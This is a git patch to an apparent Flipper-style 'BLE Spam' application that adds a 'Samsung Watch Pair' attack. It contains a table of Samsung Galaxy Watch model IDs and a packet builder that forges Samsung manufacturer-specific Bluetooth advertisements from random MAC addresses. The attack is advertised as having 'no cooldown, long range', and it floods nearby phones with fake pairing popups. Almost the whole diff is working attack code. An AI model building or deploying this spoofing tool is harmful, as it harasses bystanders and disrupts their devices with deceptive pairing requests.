From 4a97cb40b860b2e761f0bdfb776bdd726c6efaeb Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sat, 21 Oct 2023 03:54:59 +0100 Subject: [PATCH] BLE Spam add Samsung Watch spam --- applications/external/ble_spam/ble_spam.c | 25 ++- .../external/ble_spam/protocols/smartthings.c | 198 ++++++++++++++++++ .../external/ble_spam/protocols/smartthings.h | 4 + .../ble_spam/protocols/smartthings_scenes.h | 2 + 4 files changed, 227 insertions(+), 2 deletions(-) diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index d929a4f6c..ae5d761c1 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -88,7 +88,7 @@ static Attack attacks[] = { }, }, { - .title = "Samsung Buds Pair", + .title = "Samsung Buds Popup", .text = "No cooldown, long range", .protocol = &protocol_smartthings, .payload = @@ -96,7 +96,28 @@ static Attack attacks[] = { .random_mac = true, .cfg = { - .smartthings = {}, + .smartthings = + { + .type = SmartthingsTypeBuds, + .data = {}, + }, + }, + }, + }, + { + .title = "Samsung Watch Pair", + .text = "No cooldown, long range", + .protocol = &protocol_smartthings, + .payload = + { + .random_mac = true, + .cfg = + { + .smartthings = + { + .type = SmartthingsTypeWatch, + .data = {}, + }, }, }, }, diff --git a/applications/external/ble_spam/protocols/smartthings.c b/applications/external/ble_spam/protocols/smartthings.c index 61e91f5ea..d53f12846 100644 --- a/applications/external/ble_spam/protocols/smartthings.c +++ b/applications/external/ble_spam/protocols/smartthings.c @@ -21,8 +21,42 @@ const struct { }; const uint8_t buds_models_count = COUNT_OF(buds_models); +const struct { + uint8_t value; + const char* name; +} watch_models[] = { + {0x01, "White Watch4 Classic 44"}, + {0x02, "Black Watch4 Classic 40"}, + {0x03, "White Watch4 Classic 40"}, + {0x04, "Black Watch4 44mm"}, + {0x05, "Silver Watch4 44mm"}, + {0x06, "Green Watch4 44mm"}, + {0x07, "Black Watch4 40mm"}, + {0x08, "White Watch4 40mm"}, + {0x09, "Gold Watch4 40mm"}, + {0x0a, "French Watch4"}, + {0x0b, "French Watch4 Classic"}, + {0x0c, "Fox Watch5 44mm"}, + {0x11, "Black Watch5 44mm"}, + {0x12, "Sapphire Watch5 44mm"}, + {0x13, "Purpleish Watch5 40mm"}, + {0x14, "Gold Watch5 40mm"}, + {0x15, "Black Watch5 Pro 45mm"}, + {0x16, "Gray Watch5 Pro 45mm"}, + {0x17, "White Watch5 44mm"}, + {0x18, "White & Black Watch5"}, + {0x1b, "Black Watch6 Pink 40mm"}, + {0x1c, "Gold Watch6 Gold 40mm"}, + {0x1d, "Silver Watch6 Cyan 44mm"}, + {0x1e, "Black Watch6 Classic 43mm"}, + {0x20, "Green Goofy"}, + {0x1a, "Fallback Watch"}, +}; +const uint8_t watch_models_count = COUNT_OF(watch_models); + static const char* type_names[SmartthingsTypeMAX] = { [SmartthingsTypeBuds] = "SmartThings Buds", + [SmartthingsTypeWatch] = "SmartThings Watch", }; static const char* smartthings_get_name(const ProtocolCfg* _cfg) { const SmartthingsCfg* cfg = &_cfg->smartthings; @@ -31,6 +65,7 @@ static const char* smartthings_get_name(const ProtocolCfg* _cfg) { static uint8_t packet_sizes[SmartthingsTypeMAX] = { [SmartthingsTypeBuds] = 31, + [SmartthingsTypeWatch] = 15, }; void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const ProtocolCfg* _cfg) { const SmartthingsCfg* cfg = _cfg ? &_cfg->smartthings : NULL; @@ -90,6 +125,31 @@ void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const Prot // Truncated AD segment, Android seems to fill in the rest with zeros break; } + case SmartthingsTypeWatch: { + uint8_t model; + if(cfg && cfg->data.watch.model != 0x00) { + model = cfg->data.watch.model; + } else { + model = watch_models[rand() % watch_models_count].value; + } + + packet[i++] = 14; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.) + packet[i++] = 0x00; // ... + packet[i++] = 0x01; + packet[i++] = 0x00; + packet[i++] = 0x02; + packet[i++] = 0x00; + packet[i++] = 0x01; + packet[i++] = 0x01; + packet[i++] = 0xFF; + packet[i++] = 0x00; + packet[i++] = 0x00; + packet[i++] = 0x43; + packet[i++] = (model >> 0x00) & 0xFF; + break; + } default: break; } @@ -102,6 +162,10 @@ enum { _ConfigBudsExtraStart = ConfigExtraStart, ConfigBudsModel, }; +enum { + _ConfigWatchExtraStart = ConfigExtraStart, + ConfigWatchModel, +}; static void config_callback(void* _ctx, uint32_t index) { Ctx* ctx = _ctx; SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; @@ -117,6 +181,16 @@ static void config_callback(void* _ctx, uint32_t index) { } break; } + case SmartthingsTypeWatch: { + switch(index) { + case ConfigWatchModel: + scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModel); + break; + default: + break; + } + break; + } default: break; } @@ -133,6 +207,18 @@ static void buds_model_changed(VariableItem* item) { variable_item_set_current_value_text(item, "Random"); } } +static void watch_model_changed(VariableItem* item) { + SmartthingsCfg* cfg = variable_item_get_context(item); + uint8_t index = variable_item_get_current_value_index(item); + if(index) { + index--; + cfg->data.watch.model = watch_models[index].value; + variable_item_set_current_value_text(item, watch_models[index].name); + } else { + cfg->data.watch.model = 0x00; + variable_item_set_current_value_text(item, "Random"); + } +} static void smartthings_extra_config(Ctx* ctx) { SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; VariableItemList* list = ctx->variable_item_list; @@ -166,6 +252,32 @@ static void smartthings_extra_config(Ctx* ctx) { variable_item_set_current_value_text(item, model_name); break; } + case SmartthingsTypeWatch: { + item = variable_item_list_add( + list, "Model", watch_models_count + 1, watch_model_changed, cfg); + const char* model_name = NULL; + char model_name_buf[3]; + if(cfg->data.watch.model == 0x00) { + model_name = "Random"; + value_index = 0; + } else { + for(uint8_t i = 0; i < watch_models_count; i++) { + if(cfg->data.watch.model == watch_models[i].value) { + model_name = watch_models[i].name; + value_index = i + 1; + break; + } + } + if(!model_name) { + snprintf(model_name_buf, sizeof(model_name_buf), "%02X", cfg->data.watch.model); + model_name = model_name_buf; + value_index = watch_models_count + 1; + } + } + variable_item_set_current_value_index(item, value_index); + variable_item_set_current_value_text(item, model_name); + break; + } default: break; } @@ -268,3 +380,89 @@ void scene_smartthings_buds_model_custom_on_exit(void* _ctx) { cfg->data.buds.model = (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00); } + +static void watch_model_callback(void* _ctx, uint32_t index) { + Ctx* ctx = _ctx; + SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; + switch(index) { + case 0: + cfg->data.watch.model = 0x00; + scene_manager_previous_scene(ctx->scene_manager); + break; + case watch_models_count + 1: + scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModelCustom); + break; + default: + cfg->data.watch.model = watch_models[index - 1].value; + scene_manager_previous_scene(ctx->scene_manager); + break; + } +} +void scene_smartthings_watch_model_on_enter(void* _ctx) { + Ctx* ctx = _ctx; + SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; + Submenu* submenu = ctx->submenu; + uint32_t selected = 0; + bool found = false; + submenu_reset(submenu); + + submenu_add_item(submenu, "Random", 0, watch_model_callback, ctx); + if(cfg->data.watch.model == 0x00) { + found = true; + selected = 0; + } + for(uint8_t i = 0; i < watch_models_count; i++) { + submenu_add_item(submenu, watch_models[i].name, i + 1, watch_model_callback, ctx); + if(!found && cfg->data.watch.model == watch_models[i].value) { + found = true; + selected = i + 1; + } + } + submenu_add_item(submenu, "Custom", watch_models_count + 1, watch_model_callback, ctx); + if(!found) { + found = true; + selected = watch_models_count + 1; + } + + submenu_set_selected_item(submenu, selected); + + view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu); +} +bool scene_smartthings_watch_model_on_event(void* _ctx, SceneManagerEvent event) { + UNUSED(_ctx); + UNUSED(event); + return false; +} +void scene_smartthings_watch_model_on_exit(void* _ctx) { + UNUSED(_ctx); +} + +static void watch_model_custom_callback(void* _ctx) { + Ctx* ctx = _ctx; + scene_manager_previous_scene(ctx->scene_manager); + scene_manager_previous_scene(ctx->scene_manager); +} +void scene_smartthings_watch_model_custom_on_enter(void* _ctx) { + Ctx* ctx = _ctx; + SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; + ByteInput* byte_input = ctx->byte_input; + + byte_input_set_header_text(byte_input, "Enter custom Model"); + + ctx->byte_store[0] = (cfg->data.watch.model >> 0x00) & 0xFF; + + byte_input_set_result_callback( + byte_input, watch_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1); + + view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput); +} +bool scene_smartthings_watch_model_custom_on_event(void* _ctx, SceneManagerEvent event) { + UNUSED(_ctx); + UNUSED(event); + return false; +} +void scene_smartthings_watch_model_custom_on_exit(void* _ctx) { + Ctx* ctx = _ctx; + SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; + cfg->data.watch.model = (ctx->byte_store[0] << 0x00); +} diff --git a/applications/external/ble_spam/protocols/smartthings.h b/applications/external/ble_spam/protocols/smartthings.h index 38717abd0..36c3e9e81 100644 --- a/applications/external/ble_spam/protocols/smartthings.h +++ b/applications/external/ble_spam/protocols/smartthings.h @@ -6,6 +6,7 @@ typedef enum { SmartthingsTypeBuds, + SmartthingsTypeWatch, SmartthingsTypeMAX, } SmartthingsType; @@ -15,6 +16,9 @@ typedef struct { struct { uint32_t model; } buds; + struct { + uint8_t model; + } watch; } data; } SmartthingsCfg; diff --git a/applications/external/ble_spam/protocols/smartthings_scenes.h b/applications/external/ble_spam/protocols/smartthings_scenes.h index d765e4922..d184880da 100644 --- a/applications/external/ble_spam/protocols/smartthings_scenes.h +++ b/applications/external/ble_spam/protocols/smartthings_scenes.h @@ -1,2 +1,4 @@ ADD_SCENE(smartthings_buds_model, SmartthingsBudsModel) ADD_SCENE(smartthings_buds_model_custom, SmartthingsBudsModelCustom) +ADD_SCENE(smartthings_watch_model, SmartthingsWatchModel) +ADD_SCENE(smartthings_watch_model_custom, SmartthingsWatchModelCustom)